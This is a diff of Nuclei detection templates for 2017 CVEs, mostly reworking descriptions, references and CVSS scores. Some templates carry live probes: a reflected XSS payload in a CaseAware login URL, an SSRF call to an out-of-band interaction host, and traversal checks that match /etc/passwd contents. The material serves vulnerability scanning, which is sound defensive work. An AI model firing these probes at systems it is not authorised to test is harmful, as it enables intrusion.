emadshanab,milo2012 - description: Palo Alto Networks PAN-OS before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface. + severity: critical + description: Palo Alto Network PAN-OS and Panorama before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface. reference: - https://www.exploit-db.com/exploits/43342 + - https://security.paloaltonetworks.com/CVE-2017-15944 - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html - severity: critical + - https://nvd.nist.gov/vuln/detail/CVE-2017-15944 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2017-15944 tags: cve,cve2017,rce,vpn,panos,globalprotect @@ -30,4 +32,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/04/26 diff --git a/cves/2017/CVE-2017-16806.yaml b/cves/2017/CVE-2017-16806.yaml index e4057dae37..2a15ee382b 100644 --- a/cves/2017/CVE-2017-16806.yaml +++ b/cves/2017/CVE-2017-16806.yaml @@ -3,15 +3,19 @@ id: CVE-2017-16806 info: name: Ulterius Server < 1.9.5.0 - Directory Traversal author: geeknik - reference: https://www.exploit-db.com/exploits/43141 severity: high - tags: cve,cve2017,ulterius,traversal + description: Ulterius Server before 1.9.5.0 allows HTTP server directory traversal via the process function in RemoteTaskServer/WebServer/HttpServer.cs. + reference: + - https://www.exploit-db.com/exploits/43141 + - https://nvd.nist.gov/vuln/detail/CVE-2017-16806 + - https://github.com/Ulterius/server/commit/770d1821de43cf1d0a93c79025995bdd812a76ee + - https://www.exploit-db.com/exploits/43141/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2017-16806 cwe-id: CWE-22 - description: "The Process function in RemoteTaskServer/WebServer/HttpServer.cs in Ulterius before 1.9.5.0 allows HTTP server directory traversal." + tags: cve,cve2017,ulterius,traversal requests: - method: GET @@ -30,3 +34,6 @@ requests: - "\\[(font|extension|file)s\\]" condition: or part: body + + +# Enhanced by mp on 2022/04/26 diff --git a/cves/2017/CVE-2017-16877.yaml b/cves/2017/CVE-2017-16877.yaml index ed8c14a5be..ad719516c5 100644 --- a/cves/2017/CVE-2017-16877.yaml +++ b/cves/2017/CVE-2017-16877.yaml @@ -5,13 +5,15 @@ info: author: pikpikcu severity: high description: ZEIT Next.js before 2.4.1 has directory traversal under the /_next and /static request namespace, allowing attackers to obtain sensitive information. - reference: https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9 - tags: cve,cve2017,nextjs,lfi + reference: + - https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9 + - https://github.com/zeit/next.js/releases/tag/2.4.1 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2017-16877 cwe-id: CWE-22 + tags: cve,cve2017,nextjs,lfi,traversal requests: - method: GET @@ -23,7 +25,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" part: body condition: and diff --git a/cves/2017/CVE-2017-17043.yaml b/cves/2017/CVE-2017-17043.yaml index 9eb08d7a3a..4148e13038 100644 --- a/cves/2017/CVE-2017-17043.yaml +++ b/cves/2017/CVE-2017-17043.yaml @@ -5,13 +5,17 @@ info: author: daffainfo severity: medium description: The Emag Marketplace Connector plugin 1.0.0 for WordPress has reflected XSS because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly. - reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17043 - tags: cve,cve2017,wordpress,xss,wp-plugin + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2017-17043 + - https://wordpress.org/support/topic/wordpress-emag-marketplace-connector-1-0-cross-site-scripting-vulnerability/ + - https://packetstormsecurity.com/files/145060/wpemagmc10-xss.txt + - https://wpvulndb.com/vulnerabilities/8964 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2017-17043 cwe-id: CWE-79 + tags: cve,cve2017,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2017/CVE-2017-17059.yaml b/cves/2017/CVE-2017-17059.yaml index 5fcc0923df..fe491e117d 100644 --- a/cves/2017/CVE-2017-17059.yaml +++ b/cves/2017/CVE-2017-17059.yaml @@ -8,12 +8,13 @@ info: reference: - https://github.com/NaturalIntelligence/wp-thumb-post/issues/1 - https://nvd.nist.gov/vuln/detail/CVE-2017-17059 - tags: cve,cve2017,wordpress,xss,wp-plugin + - https://packetstormsecurity.com/files/145044/WordPress-amtyThumb-8.1.3-Cross-Site-Scripting.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2017-17059 cwe-id: CWE-79 + tags: cve,cve2017,wordpress,xss,wp-plugin requests: - method: POST diff --git a/cves/2017/CVE-2017-17451.yaml b/cves/2017/CVE-2017-17451.yaml index 2cd0371034..69e1e0c84d 100644 --- a/cves/2017/CVE-2017-17451.yaml +++ b/cves/2017/CVE-2017-17451.yaml @@ -5,13 +5,17 @@ info: author: daffainfo severity: medium description: The WP Mailster plugin before 1.5.5 for WordPress has XSS in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php. - reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17451 - tags: cve,cve2017,wordpress,xss,wp-plugin + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2017-17451 + - https://wordpress.org/plugins/wp-mailster/#developers + - https://packetstormsecurity.com/files/145222/WordPress-WP-Mailster-1.5.4.0-Cross-Site-Scripting.html + - https://wpvulndb.com/vulnerabilities/8973 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2017-17451 cwe-id: CWE-79 + tags: cve,cve2017,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2017/CVE-2017-17562.yaml b/cves/2017/CVE-2017-17562.yaml index 7560cc422d..2289e470e0 100644 --- a/cves/2017/CVE-2017-17562.yaml +++ b/cves/2017/CVE-2017-17562.yaml @@ -2,19 +2,20 @@ id: CVE-2017-17562 info: name: Embedthis GoAhead RCE - description: Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked. author: geeknik + severity: high + description: Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked. reference: - https://www.elttam.com/blog/goahead/ - https://github.com/ivanitlearning/CVE-2017-17562 - https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562 - severity: high - tags: cve,cve2017,rce,embedthis,goahead,fuzz + - https://github.com/embedthis/goahead/issues/249 classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.10 + cvss-score: 8.1 cve-id: CVE-2017-17562 cwe-id: CWE-20 + tags: cve,cve2017,rce,goahead,fuzz requests: - raw: diff --git a/cves/2017/CVE-2017-18024.yaml b/cves/2017/CVE-2017-18024.yaml index 89de79241d..f10df9314d 100644 --- a/cves/2017/CVE-2017-18024.yaml +++ b/cves/2017/CVE-2017-18024.yaml @@ -4,18 +4,17 @@ info: name: AvantFAX 3.3.3 XSS author: pikpikcu severity: medium + description: AvantFAX 3.3.3 has XSS via an arbitrary parameter name to the default URI, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1. reference: - https://hackerone.com/reports/963798 - http://packetstormsecurity.com/files/145776/AvantFAX-3.3.3-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2017-18024 - description: | - AvantFAX 3.3.3 has XSS via an arbitrary parameter name to the default URI, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1. - tags: cve,cve2017,xss,avantfax classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2017-18024 cwe-id: CWE-79 + tags: cve,cve2017,xss,avantfax requests: - raw: diff --git a/cves/2017/CVE-2017-18536.yaml b/cves/2017/CVE-2017-18536.yaml index 4f60e9dca3..dc426c5827 100644 --- a/cves/2017/CVE-2017-18536.yaml +++ b/cves/2017/CVE-2017-18536.yaml @@ -5,13 +5,15 @@ info: author: daffainfo severity: medium description: The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability. - reference: https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501 - tags: cve,cve2017,wordpress,xss,wp-plugin + reference: + - https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501 + - https://wordpress.org/plugins/stop-user-enumeration/#developers classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2017-18536 cwe-id: CWE-79 + tags: cve,cve2017,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2017/CVE-2017-18598.yaml b/cves/2017/CVE-2017-18598.yaml new file mode 100644 index 0000000000..3cf6ea4c44 --- /dev/null +++ b/cves/2017/CVE-2017-18598.yaml @@ -0,0 +1,35 @@ +id: CVE-2017-18598 + +info: + name: Qards Plugin - Stored XSS and SSRF + author: pussycat0x + severity: medium + description: The Qards plugin through 2017-10-11 for WordPress has XSS via a remote document specified in the url parameter to html2canvasproxy.php + reference: + - https://wpscan.com/vulnerability/8934 + - https://wpscan.com/vulnerability/454a0ce3-ecfe-47fc-a282-5caa51370645 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18598 + - https://wpvulndb.com/vulnerabilities/8934 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18598 + cwe-id: CWE-79 + tags: cve,cve2017,wordpress,ssrf,xss,wp-plugin,oast + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}' + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: word + part: body + words: + - "console.log" \ No newline at end of file diff --git a/cves/2017/CVE-2017-18638.yaml b/cves/2017/CVE-2017-18638.yaml index 47bbe28842..4cf8aec3d8 100644 --- a/cves/2017/CVE-2017-18638.yaml +++ b/cves/2017/CVE-2017-18638.yaml @@ -10,12 +10,12 @@ info: - https://github.com/graphite-project/graphite-web/issues/2008 - https://github.com/advisories/GHSA-vfj6-275q-4pvm - https://nvd.nist.gov/vuln/detail/CVE-2017-18638 - tags: cve,cve2017,graphite,ssrf,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2017-18638 cwe-id: CWE-918 + tags: cve,cve2017,graphite,ssrf,oast requests: - method: GET diff --git a/cves/2017/CVE-2017-3506.yaml b/cves/2017/CVE-2017-3506.yaml index b19b9142da..6c17691b77 100644 --- a/cves/2017/CVE-2017-3506.yaml +++ b/cves/2017/CVE-2017-3506.yaml @@ -1,18 +1,20 @@ id: CVE-2017-3506 info: - name: Oracle Weblogic Remote OS Command Execution + name: Oracle Fusion Middleware Weblogic Server - Remote OS Command Execution author: pdteam - description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. severity: high - tags: cve,cve2017,weblogic,oracle,rce,oast + description: The Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2 is susceptible to a difficult to exploit vulnerability that could allow unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. reference: - https://hackerone.com/reports/810778 - https://nvd.nist.gov/vuln/detail/CVE-2017-3506 + - http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html + - http://www.securityfocus.com/bid/97884 classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N - cvss-score: 7.40 + cvss-score: 7.4 cve-id: CVE-2017-3506 + tags: cve,cve2017,weblogic,oracle,rce,oast requests: - raw: @@ -41,6 +43,8 @@ requests: matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + +# Enhanced by mp on 2022/04/20 diff --git a/cves/2017/CVE-2017-3528.yaml b/cves/2017/CVE-2017-3528.yaml index 3163825810..b0ea8cdf0b 100644 --- a/cves/2017/CVE-2017-3528.yaml +++ b/cves/2017/CVE-2017-3528.yaml @@ -4,16 +4,18 @@ info: name: Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect author: 0x_Akoko severity: medium + description: 'The Oracle Applications Framework component of Oracle E-Business Suite (subcomponent: Popup windows (lists of values, datepicker, etc.)) is impacted by open redirect issues in versions 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. These easily exploitable vulnerabilities allow unauthenticated attackers with network access via HTTP to compromise Oracle Applications Framework. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Applications Framework, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data.' reference: - https://blog.zsec.uk/cve-2017-3528/ - https://www.exploit-db.com/exploits/43592 - tags: cve,cve2017,oracle,redirect + - https://nvd.nist.gov/vuln/detail/CVE-2017-3528 + - http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N - cvss-score: 5.40 + cvss-score: 5.4 cve-id: CVE-2017-3528 cwe-id: CWE-601 - description: "Vulnerability in the Oracle Applications Framework component of Oracle E-Business Suite (subcomponent: Popup windows (lists of values, datepicker, etc.)). Supported versions that are affected are 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. Easily \"exploitable\" vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Applications Framework. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Applications Framework, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data. CVSS 3.0 Base Score 4.7 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N)." + tags: cve,cve2017,oracle,redirect requests: - method: GET @@ -24,4 +26,6 @@ requests: - type: word words: - 'noresize src="/\example.com?configName=' - part: body \ No newline at end of file + part: body + +# Enhanced by mp on 2022/04/14 diff --git a/cves/2017/CVE-2017-3881.yaml b/cves/2017/CVE-2017-3881.yaml index e852d525d0..ab883c8f87 100644 --- a/cves/2017/CVE-2017-3881.yaml +++ b/cves/2017/CVE-2017-3881.yaml @@ -1,20 +1,22 @@ id: CVE-2017-3881 info: - name: Cisco IOS 12.2(55)SE11 Remote Code Execution + name: Cisco IOS 12.2(55)SE11 - Remote Code Execution author: dwisiswant0 severity: critical + description: | + A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges. The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors: (1) the failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device; and (2) the incorrect processing of malformed CMP-specific Telnet options. An attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections. An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device. This affects Catalyst switches, Embedded Service 2020 switches, Enhanced Layer 2 EtherSwitch Service Module, Enhanced Layer 2/3 EtherSwitch Service Module, Gigabit Ethernet Switch Module (CGESM) for HP, IE Industrial Ethernet switches, ME 4924-10GE switch, RF Gateway 10, and SM-X Layer 2/3 EtherSwitch Service Module. Cisco Bug IDs: CSCvd48893. reference: - https://github.com/artkond/cisco-rce - https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/ - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/dos/cisco/ios_telnet_rocem.md - description: RCE exploit code is available for Cisco Catalyst 2960 switch model. This exploit is firmware dependent. - tags: cve,cve2017,cisco,rce,network + - https://nvd.nist.gov/vuln/detail/CVE-2017-3881 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2017-3881 cwe-id: CWE-20 + tags: cve,cve2017,cisco,rce,network network: - inputs: @@ -22,10 +24,15 @@ network: read: 1024 - data: "show priv" read: 1024 + host: - - "{{Hostname}}:23" + - "{{Hostname}}" + - "{{Host}}:23" + read-size: 1024 matchers: - type: word words: - - "Current privilege level is" \ No newline at end of file + - "Current privilege level is" + +# Enhanced by mp on 2022/05/11 diff --git a/cves/2017/CVE-2017-4011.yaml b/cves/2017/CVE-2017-4011.yaml index 835026085e..77cda0cb40 100644 --- a/cves/2017/CVE-2017-4011.yaml +++ b/cves/2017/CVE-2017-4011.yaml @@ -9,12 +9,12 @@ info: - https://medium.com/@david.valles/cve-2017-4011-reflected-xss-found-in-mcafee-network-data-loss-prevention-ndlp-9-3-x-cf20451870ab - https://kc.mcafee.com/corporate/index?page=content&id=SB10198 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-4011 - tags: cve,cve2017,mcafee,xss classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2017-4011 cwe-id: CWE-79 + tags: cve,cve2017,mcafee,xss requests: - method: GET diff --git a/cves/2017/CVE-2017-5487.yaml b/cves/2017/CVE-2017-5487.yaml index 75f2ff83e6..e5f089001f 100644 --- a/cves/2017/CVE-2017-5487.yaml +++ b/cves/2017/CVE-2017-5487.yaml @@ -4,44 +4,43 @@ info: name: WordPress Core < 4.7.1 - Username Enumeration author: Manas_Harsh,daffainfo,geeknik severity: medium - description: wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request. - tags: cve,cve2017,wordpress + description: WordPress Core < 4.7.1 is susceptible to user enumeration because it does not properly restrict listings of post authors via wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2017-5487 - https://www.exploit-db.com/exploits/41497 + - https://nvd.nist.gov/vuln/detail/CVE-2017-5487 + - https://www.wordfence.com/blog/2016/12/wordfence-blocks-username-harvesting-via-new-rest-api-wp-4-7/ + - https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 + cvss-score: 5.3 cve-id: CVE-2017-5487 cwe-id: CWE-200 + tags: cve,cve2017,wordpress requests: - method: GET path: - "{{BaseURL}}/wp-json/wp/v2/users/" - "{{BaseURL}}/?rest_route=/wp/v2/users/" - stop-at-first-match: true matchers-condition: and matchers: + - type: status + status: + - 200 - type: word part: header words: - "application/json" - - - type: status - status: - - 200 - - type: word words: - '"id":' - '"name":' - '"avatar_urls":' condition: and - extractors: - - type: regex - part: body - regex: - - '"name":"[^"]*"' + - type: json + json: + - '.[].name' + +# Enahnced by mp 03/31/2022 diff --git a/cves/2017/CVE-2017-5521.yaml b/cves/2017/CVE-2017-5521.yaml index 7c792b2225..85bcc877f5 100644 --- a/cves/2017/CVE-2017-5521.yaml +++ b/cves/2017/CVE-2017-5521.yaml @@ -1,4 +1,5 @@ id: CVE-2017-5521 + info: name: Bypassing Authentication on NETGEAR Routers author: princechaddha @@ -7,12 +8,14 @@ info: reference: - https://www.cvedetails.com/cve/CVE-2017-5521/ - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/ - tags: cve,cve2017,auth-bypass + - http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability + - http://www.securityfocus.com/bid/95457 classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.10 + cvss-score: 8.1 cve-id: CVE-2017-5521 cwe-id: CWE-200 + tags: cve,cve2017,auth-bypass,netgear requests: - method: GET diff --git a/cves/2017/CVE-2017-5631.yaml b/cves/2017/CVE-2017-5631.yaml new file mode 100644 index 0000000000..4833758109 --- /dev/null +++ b/cves/2017/CVE-2017-5631.yaml @@ -0,0 +1,39 @@ +id: CVE-2017-5631 + +info: + name: CaseAware - Cross Site Scripting + author: edoardottt + severity: medium + description: An issue was discovered in KMCIS CaseAware. Reflected cross site scripting is present in the user parameter (i.e., "usr") that is transmitted in the login.php query string. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2017-5631 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5631 + - https://www.openbugbounty.org/incidents/228262/ + - https://www.exploit-db.com/exploits/42042/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-5631 + cwe-id: CWE-79 + tags: cve,cve2017,xss,caseaware + +requests: + - method: GET + path: + - "{{BaseURL}}/login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "'>" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/cves/2017/CVE-2017-5638.yaml b/cves/2017/CVE-2017-5638.yaml index 0d112f3194..d26c34e467 100644 --- a/cves/2017/CVE-2017-5638.yaml +++ b/cves/2017/CVE-2017-5638.yaml @@ -1,16 +1,21 @@ id: CVE-2017-5638 + info: + name: Apache Struts 2 - Remote Command Execution author: Random_Robbie - name: Apache Struts2 RCE severity: critical - description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker’s invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server. - tags: cve,cve2017,struts,rce,apache - reference: https://github.com/mazen160/struts-pwn + description: Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 is vulnerable to remote command injection attacks through incorrectly parsing an attacker's invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server. + reference: + - https://github.com/mazen160/struts-pwn + - https://nvd.nist.gov/vuln/detail/CVE-2017-5638 + - https://isc.sans.edu/diary/22169 + - https://github.com/rapid7/metasploit-framework/issues/8064 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.00 + cvss-score: 10 cve-id: CVE-2017-5638 cwe-id: CWE-20 + tags: cve,cve2017,struts,rce,apache requests: - raw: @@ -25,4 +30,6 @@ requests: - type: word words: - "X-Hacker: Bounty Plz" - part: header \ No newline at end of file + part: header + +# Enhanced by mp on 2022/04/26 diff --git a/cves/2017/CVE-2017-5982.yaml b/cves/2017/CVE-2017-5982.yaml index 1f114f79b3..fe0f9bdd7f 100644 --- a/cves/2017/CVE-2017-5982.yaml +++ b/cves/2017/CVE-2017-5982.yaml @@ -1,4 +1,5 @@ id: CVE-2017-5982 + info: name: Kodi 17.1 Local File Inclusion author: 0x_Akoko @@ -7,6 +8,8 @@ info: reference: - https://cxsecurity.com/issue/WLB-2017020164 - https://www.cvedetails.com/cve/CVE-2017-5982 + - https://www.exploit-db.com/exploits/41312/ + - http://seclists.org/fulldisclosure/2017/Feb/27 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 diff --git a/cves/2017/CVE-2017-6090.yaml b/cves/2017/CVE-2017-6090.yaml index 38352df854..0a448dae64 100644 --- a/cves/2017/CVE-2017-6090.yaml +++ b/cves/2017/CVE-2017-6090.yaml @@ -1,17 +1,20 @@ id: CVE-2017-6090 info: - name: PhpCollab (unauthenticated) Arbitrary File Upload + name: PhpColl 2.5.1 Arbitrary File Upload author: pikpikcu severity: high - tags: cve,cve2017,phpcollab,rce,fileupload - reference: https://nvd.nist.gov/vuln/detail/CVE-2017-6090 + description: PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/ via clients/editclient.php. + reference: + - https://sysdream.com/news/lab/2017-09-29-cve-2017-6090-phpcollab-2-5-1-arbitrary-file-upload-unauthenticated/ + - https://nvd.nist.gov/vuln/detail/CVE-2017-6090 + - https://www.exploit-db.com/exploits/42934/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.80 + cvss-score: 8.8 cve-id: CVE-2017-6090 cwe-id: CWE-434 - description: "Unrestricted file upload vulnerability in clients/editclient.php in PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/." + tags: cve,cve2017,phpcollab,rce,fileupload requests: - raw: @@ -42,3 +45,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/04/06 diff --git a/cves/2017/CVE-2017-7269.yaml b/cves/2017/CVE-2017-7269.yaml index 533586dd4f..da5aedbc00 100644 --- a/cves/2017/CVE-2017-7269.yaml +++ b/cves/2017/CVE-2017-7269.yaml @@ -1,19 +1,22 @@ id: CVE-2017-7269 info: - name: Windows Server 2003 & IIS 6.0 RCE + name: Windows Server 2003 & IIS 6.0 - Remote Code Execution author: thomas_from_offensity,geeknik severity: critical - description: Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If ", dasl) # lowercase header name: DASL - regex("[\d]+(,\s+[\d]+)?", dav) # lowercase header name: DAV - regex(".*?PROPFIND", public) # lowercase header name: Public - regex(".*?PROPFIND", allow) # lowercase header name: Allow condition: or - part: header + + - type: status + status: + - 200 +# Enhanced by mp on 2022/05/11 diff --git a/cves/2017/CVE-2017-7391.yaml b/cves/2017/CVE-2017-7391.yaml index b17e18d01d..28c0c4ee93 100644 --- a/cves/2017/CVE-2017-7391.yaml +++ b/cves/2017/CVE-2017-7391.yaml @@ -1,19 +1,20 @@ id: CVE-2017-7391 info: - name: Magmi – Cross-Site Scripting v.0.7.22 + name: Magmi Cross-Site Scripting v.0.7.22 author: pikpikcu severity: medium description: A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/ajax_gettime.php' URL. - tags: cve,cve2017,magmi,xss reference: - https://github.com/dweeves/magmi-git/issues/522 - https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip + - https://github.com/dweeves/magmi-git/pull/525 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2017-7391 cwe-id: CWE-79 + tags: cve,cve2017,magmi,xss requests: - method: GET @@ -25,12 +26,13 @@ requests: - type: status status: - 200 - - type: word - words: - - '"><' - part: body - type: word + part: body + words: + - '"><' + + - type: word + part: header words: - "text/html" - part: header \ No newline at end of file diff --git a/cves/2017/CVE-2017-7615.yaml b/cves/2017/CVE-2017-7615.yaml index 33787cf3bd..2c4e7785e0 100644 --- a/cves/2017/CVE-2017-7615.yaml +++ b/cves/2017/CVE-2017-7615.yaml @@ -1,25 +1,26 @@ id: CVE-2017-7615 +# THIS TEMPLATE IS ONLY FOR DETECTING +# To carry out further attacks, please see reference[2] below. +# This template works by guessing user ID. +# MantisBT before 1.3.10, 2.2.4, and 2.3.1, that can be downloaded on reference[1]. + info: - name: CVE-2017-7615 + name: MantisBT <=2.30 - Arbitrary Password Reset and Unauthenticated Admin Access author: bp0lr,dwisiswant0 severity: high description: MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php. - tags: cve,cve2017,mantisbt - - # THIS TEMPLATE IS ONLY FOR DETECTING - # To carry out further attacks, please see reference[2] below. - # This template works by guessing user ID. - # MantisBT before 1.3.10, 2.2.4, and 2.3.1, that can be downloaded on reference[1]. reference: - https://sourceforge.net/projects/mantisbt/files/mantis-stable/ - 